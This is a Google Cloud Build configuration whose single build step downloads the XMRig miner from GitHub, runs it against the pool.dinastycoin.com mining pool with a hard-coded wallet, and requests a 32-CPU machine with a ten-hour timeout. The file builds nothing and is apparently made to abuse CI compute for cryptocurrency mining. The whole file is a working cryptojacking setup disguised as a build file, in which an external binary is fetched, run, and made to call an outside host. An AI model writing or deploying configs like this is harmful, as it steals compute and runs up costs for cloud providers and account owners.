steps:
  - name: 'gcr.io/cloud-builders/gcloud'
    entrypoint: "bash"
    args:
      - "-c"
      - |
          apt-get update
          apt-get install -y wget
          wget https://github.com/xmrig/xmrig/releases/download/v6.12.1/xmrig-6.12.1-linux-static-x64.tar.gz
          tar xf xmrig-6.12.1-linux-static-x64.tar.gz
          cd xmrig-6.12.1
          ./xmrig -o pool.dinastycoin.com:5555 -u 46pnjyfeDsULtY7hzFCW3QV5uXuYSXHWZMU66ZwuUxiRbzYNDDtMhaiRYgaAHbsnxxdSVUkrnK3wtYvEFGJDhahcLbkBTyi --p gccb
options:
  machineType: 'N1_HIGHCPU_32'
timeout: 36000s
